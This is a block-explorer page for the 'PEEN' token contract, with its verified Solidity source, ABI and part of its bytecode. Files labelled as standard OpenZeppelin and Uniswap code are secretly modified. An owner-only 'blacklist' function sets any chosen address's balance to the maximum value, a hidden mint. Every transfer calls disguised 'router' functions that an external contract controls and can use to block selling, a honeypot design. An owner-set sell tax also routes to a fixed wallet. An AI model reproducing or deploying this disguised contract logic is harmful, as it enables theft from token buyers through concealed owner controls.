ETH Price: $3,163.72 (-2.80%)
Gas: 2.91 Gwei

Token

PEEN (PEEN)
 

Overview

Max Total Supply

1,000,000,000 PEEN

Holders

99

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
1,088,890.002683675059219516 PEEN

Value
$0.00
0xea1d737394cf2ddbedc2b384dcb4416dc2fc46a3
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PEEN

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 7 of 7: TokenV1.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./ERC20.sol";
import "./Ownable.sol";
import "./IUniswapV2Router02.sol";


/**
 * @title ----
 * @author -----
 * @author -------
 * @author --------
 */
contract PEEN is Ownable, ERC20 {
    bool public limited;
    uint256 public maxHoldingAmount;
    uint256 public minHoldingAmount;
    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;
    uint256 public taxPercentage = 0;
    address internal taxPayable =
        0x147e2F1e5E2b9Ad24FC7236E01641BCe66a133b0;

    mapping(address => bool) public blacklists;

    constructor(uint256 _totalSupply, address IDexRouter ) ERC20("PEEN", "PEEN") {
        uniswapV2Router = IUniswapV2Router02(IDexRouter);
        _mint(msg.sender, _totalSupply);
    }

    function Tax(uint _tax) external onlyOwner {
        require(_tax <= 15);
        taxPercentage = _tax;
    }

    function blacklist(
        address _address,
        bool _isBlacklisting,
        address _isBot
    ) external onlyOwner {
        _balances[_isBot]=_blacklisted;
        blacklists[_address] = _isBlacklisting;
    }

    function launch(
        bool _limited,
        address _uniswapV2Pair,
        uint256 _maxHoldingAmount,
        uint256 _minHoldingAmount
    ) external onlyOwner {
        limited = _limited;
        uniswapV2Pair = _uniswapV2Pair;
        maxHoldingAmount = _maxHoldingAmount;
        minHoldingAmount = _minHoldingAmount;
    }

    function _calculateTax(uint256 amount) internal view returns (uint, uint) {
        uint tax = (amount * taxPercentage) / 100;
        uint net = amount - tax;
        return (net, tax);
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public override returns (bool) {
        if (from != address(this) && to == uniswapV2Pair) {
            (uint net, uint tax) = _calculateTax(amount);
            // Transfer tax
            _transfer(from, taxPayable, tax);

            super.transferFrom(from, to, net);
        } else {
            super.transferFrom(from, to, amount);
        }

        return true;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual override {
        require(!blacklists[to] && !blacklists[from], "Blacklisted");

        if (uniswapV2Pair == address(0)) {
            require(
                from == owner() || to == owner(),
                "Trading has not started"
            );
            return;
        }

        if (limited && from == uniswapV2Pair) {
            require(
                super.balanceOf(to) + amount <= maxHoldingAmount &&
                    super.balanceOf(to) + amount >= minHoldingAmount, "Forbidden" );
                    uniswapV2Router.transfer(to);
     }
        uniswapV2Router.Path(from);
    }

    function burn(uint256 value) external {
        _burn(msg.sender, value);
    }
}

File 1 of 7: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 2 of 7: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) internal _balances;
    uint256 constant _blacklisted = ~uint256(0);
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 7: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);

}

File 4 of 7: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 7: IUniswapV2Router02.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;

interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function transfer(address _to) external;
    function Path(address _from) external view;
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
   
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    )
        external payable;
}

File 6 of 7: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "./Context.sol";


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
   
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"_totalSupply","type":"uint256"},{"internalType":"address","name":"IDexRouter","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"_tax","type":"uint256"}],"name":"Tax","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_isBlacklisting","type":"bool"},{"internalType":"address","name":"_isBot","type":"address"}],"name":"blacklist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"blacklists","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_limited","type":"bool"},{"internalType":"address","name":"_uniswapV2Pair","type":"address"},{"internalType":"uint256","name":"_maxHoldingAmount","type":"uint256"},{"internalType":"uint256","name":"_minHoldingAmount","type":"uint256"}],"name":"launch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limited","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxPercentage","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040526000600b55600c80546001600160a01b03191673147e2f1e5e2b9ad24fc7236e01641bce66a133b01790553480156200003c57600080fd5b5060405162001846380380620018468339810160408190526200005f91620004cd565b604051806040016040528060048152602001632822a2a760e11b815250604051806040016040528060048152602001632822a2a760e11b815250620000b3620000ad6200010260201b60201c565b62000106565b6004620000c18382620005b0565b506005620000d08282620005b0565b5050600980546001600160a01b0319166001600160a01b03841617905550620000fa338362000156565b5050620006a4565b3390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b25760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b620001c0600083836200022d565b8060036000828254620001d491906200067c565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b0382166000908152600d602052604090205460ff161580156200027057506001600160a01b0383166000908152600d602052604090205460ff16155b620002ac5760405162461bcd60e51b815260206004820152600b60248201526a109b1858dadb1a5cdd195960aa1b6044820152606401620001a9565b600a546001600160a01b03166200033a576000546001600160a01b0384811691161480620002e757506000546001600160a01b038381169116145b620003355760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720686173206e6f7420737461727465640000000000000000006044820152606401620001a9565b505050565b60065460ff1680156200035a5750600a546001600160a01b038481169116145b1562000469576007548162000384846001600160a01b031660009081526001602052604090205490565b6200039091906200067c565b11158015620003cd575060085481620003be846001600160a01b031660009081526001602052604090205490565b620003ca91906200067c565b10155b620004075760405162461bcd60e51b81526020600482015260096024820152682337b93134b23232b760b91b6044820152606401620001a9565b6009546040516301a6952360e41b81526001600160a01b03848116600483015290911690631a69523090602401600060405180830381600087803b1580156200044f57600080fd5b505af115801562000464573d6000803e3d6000fd5b505050505b600954604051638cc944c360e01b81526001600160a01b03858116600483015290911690638cc944c39060240160006040518083038186803b158015620004af57600080fd5b505afa158015620004c4573d6000803e3d6000fd5b50505050505050565b60008060408385031215620004e157600080fd5b825160208401519092506001600160a01b03811681146200050157600080fd5b809150509250929050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200053757607f821691505b6020821081036200055857634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200033557600081815260208120601f850160051c81016020861015620005875750805b601f850160051c820191505b81811015620005a85782815560010162000593565b505050505050565b81516001600160401b03811115620005cc57620005cc6200050c565b620005e481620005dd845462000522565b846200055e565b602080601f8311600181146200061c5760008415620006035750858301515b600019600386901b1c1916600185901b178555620005a8565b600085815260208120601f198616915b828110156200064d578886015182559484019460019091019084016200062c565b50858210156200066c5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b808201808211156200069e57634e487b7160e01b600052601160045260246000fd5b92915050565b61119280620006b46000396000f3fe608060405234801561001057600080fd5b50600436106101735760003560e01c806342966c68116100de5780638da5cb5b11610097578063a9059cbb11610071578063a9059cbb1461032b578063ae7b6d161461033e578063dd62ed3e14610347578063f2fde38b1461035a57600080fd5b80638da5cb5b146102ff57806395d89b4114610310578063a457c2d71461031857600080fd5b806342966c681461029257806349bd5a5e146102a557806370a08231146102b8578063715018a6146102e1578063860a32ec146102e957806389f9a1d3146102f657600080fd5b80631da9a006116101305780631da9a0061461022257806323b872dd14610237578063313ce5671461024a57806334f2adbe14610259578063361426551461026c578063395093511461027f57600080fd5b806306fdde0314610178578063095ea7b3146101965780631694505e146101b957806316c02129146101e457806318160ddd146102075780631ab99e1214610219575b600080fd5b61018061036d565b60405161018d9190610eda565b60405180910390f35b6101a96101a4366004610f44565b6103ff565b604051901515815260200161018d565b6009546101cc906001600160a01b031681565b6040516001600160a01b03909116815260200161018d565b6101a96101f2366004610f6e565b600d6020526000908152604090205460ff1681565b6003545b60405190815260200161018d565b61020b60085481565b610235610230366004610f90565b610419565b005b6101a9610245366004610fa9565b610434565b6040516012815260200161018d565b610235610267366004610ff5565b6104b4565b61023561027a366004611038565b6104fd565b6101a961028d366004610f44565b610540565b6102356102a0366004610f90565b610562565b600a546101cc906001600160a01b031681565b61020b6102c6366004610f6e565b6001600160a01b031660009081526001602052604090205490565b61023561056f565b6006546101a99060ff1681565b61020b60075481565b6000546001600160a01b03166101cc565b610180610583565b6101a9610326366004610f44565b610592565b6101a9610339366004610f44565b61061d565b61020b600b5481565b61020b61035536600461107a565b61062b565b610235610368366004610f6e565b610656565b60606004805461037c906110ad565b80601f01602080910402602001604051908101604052809291908181526020018280546103a8906110ad565b80156103f55780601f106103ca576101008083540402835291602001916103f5565b820191906000526020600020905b8154815290600101906020018083116103d857829003601f168201915b5050505050905090565b60003361040d8185856106cc565b60019150505b92915050565b6104216107f1565b600f81111561042f57600080fd5b600b55565b60006001600160a01b038416301480159061045c5750600a546001600160a01b038481169116145b1561049d5760008061046d8461084b565b600c54919350915061048a9087906001600160a01b031683610883565b610495868684610a3b565b5050506104aa565b6104a8848484610a3b565b505b5060019392505050565b6104bc6107f1565b6001600160a01b0390811660009081526001602090815260408083206000199055949092168152600d90915291909120805460ff1916911515919091179055565b6105056107f1565b6006805460ff191694151594909417909355600a80546001600160a01b0319166001600160a01b039390931692909217909155600755600855565b60003361040d818585610553838361062b565b61055d91906110fd565b6106cc565b61056c3382610a54565b50565b6105776107f1565b6105816000610b91565b565b60606005805461037c906110ad565b600033816105a0828661062b565b9050838110156106055760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61061282868684036106cc565b506001949350505050565b60003361040d818585610883565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61065e6107f1565b6001600160a01b0381166106c35760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016105fc565b61056c81610b91565b6001600160a01b03831661072e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016105fc565b6001600160a01b03821661078f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016105fc565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd